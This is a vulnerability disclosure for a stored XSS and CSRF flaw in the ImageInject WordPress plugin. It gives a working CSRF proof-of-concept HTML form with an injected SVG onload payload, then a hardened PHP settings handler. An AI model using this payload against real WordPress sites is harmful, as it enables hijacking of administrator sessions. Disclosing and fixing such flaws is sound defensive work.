Well, sir, I just found a Stored-XSS bug and a CSRF bug here.
ADLab of Venustech
The report link to the wordpress-form is missing, because the manager does not wish to put the public in danger, so I'll just write some details here.
Stored-XSS
When the admin user clicks the "Save All Settings" button in the ImageInject settings page, we'll post some data to:
http://localhost/wordpress/wp-admin/options-general.php?page=wpdf-options
But when I pentested the parameters in this plugin, I found that when I write something into this point, it does not filter well.
Weak data parameter:
flickr_appid=test'"><svg/onload=console.log(/xss_at_image_inject_appid/)><'"
CSRF
Well, the stored-XSS here needs to be combined with a CSRF bug. Because there is no CSRF protection here, we can cheat the admin user into visiting the evil html on the evil site.
POC:
```html
<html>
<body>
<!-- hide the referring page from the address bar before submitting -->
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wp-admin/options-general.php?page=wpdf-options" method="POST">
<input type="hidden" name="flickr_enabled" value="1" />
<!-- quotes and angle brackets are entity-encoded so the attribute value stays intact -->
<input type="hidden" name="flickr_appid" value="test'&quot;&gt;&lt;svg/onload=console.log(/xss_at_image_inject/)&gt;&lt;'&quot;" />
<input type="hidden" name="flickr_license" value="test" />
<input type="hidden" name="flickr_sort" value="relevance" />
<input type="hidden" name="pixabay_enabled" value="1" />
<input type="hidden" name="pixabay_image_type" value="all" />
<input type="hidden" name="general_save_images" value="1" />
<input type="hidden" name="general_feat_img_size" value="medium" />
<input type="hidden" name="general_default_align" value="none" />
<input type="hidden" name="general_attr_location" value="caption" />
<input type="hidden" name="general_items_per_req" value="40" />
<input type="hidden" name="advanced_img_template" value="&lt;img title=&quot;{title} by {author}&quot; alt=&quot;{keyword} photo&quot; src=&quot;{srs}&quot; /&gt;" />
<input type="hidden" name="advanced_attr_template" value="&lt;small&gt;Photo by &lt;a href=&quot;{link}&quot; target=&quot;_blank&quot;&gt;{author}&lt;/a&gt; {cc_icon}&lt;/small&gt;" />
<input type="hidden" name="advanced_attr_template_multi" value="&lt;small&gt;Photos by {linklist}&lt;/small&gt;" />
<input type="hidden" name="advanced_filename_template" value="(unknown)_{keyword}" />
<input type="hidden" name="save_options" value="Save All Settings" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
In a word, if the manager could be cheated into visiting my evil html on my site, I could get the manager's cookie easily, or do something more evil.
Well, by the way, I just tested the bug in WordPress 4.9.1 and the latest version of the wp-plugin ImageInject.
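For maintainers reading this, here is an added example (not ImageInject's own code) of how a WordPress settings handler like the one described above closes both issues at once: a nonce plus capability check on the save request rejects a forged cross-site POST, and sanitising on input plus esc_attr() on output keeps a value like the flickr_appid payload from rendering as markup. The option name wpdf_flickr_appid and the nonce action/field names are assumptions; every WordPress function used is a real core API.

```php
<?php
// Added example, not the plugin's code. Option and nonce names are assumed.

// Vulnerable pattern: no CSRF token, no capability check, raw echo of the option.
function wpdf_save_options_vulnerable() {
    if ( isset( $_POST['save_options'] ) ) {
        update_option( 'wpdf_flickr_appid', $_POST['flickr_appid'] ); // stored unsanitised
    }
    // Unescaped output: a stored ' " > < sequence breaks out of the attribute.
    echo '<input name="flickr_appid" value="' . get_option( 'wpdf_flickr_appid' ) . '" />';
}

// Hardened pattern.
function wpdf_save_options_hardened() {
    if ( isset( $_POST['save_options'] ) ) {
        // 1. Only users allowed to manage options may save settings.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient permissions.' );
        }
        // 2. Verify the nonce emitted by wp_nonce_field() below. A third-party
        //    page cannot read the admin's nonce, so a forged POST dies here.
        check_admin_referer( 'wpdf_save_options', 'wpdf_nonce' );
        // 3. Sanitise before storing (WordPress slashes $_POST, hence wp_unslash).
        $appid = sanitize_text_field( wp_unslash( $_POST['flickr_appid'] ?? '' ) );
        update_option( 'wpdf_flickr_appid', $appid );
    }
    $appid = get_option( 'wpdf_flickr_appid', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'wpdf_save_options', 'wpdf_nonce' ); ?>
        <!-- 4. Escape on output so ' " < > become entities, not markup. -->
        <input type="text" name="flickr_appid" value="<?php echo esc_attr( $appid ); ?>" />
        <input type="submit" name="save_options" value="Save All Settings" />
    </form>
    <?php
}
```

Steps 1 and 2 remove the CSRF path the PoC above relies on; steps 3 and 4 are independent of it and stop the stored XSS even if the option is written by some other route.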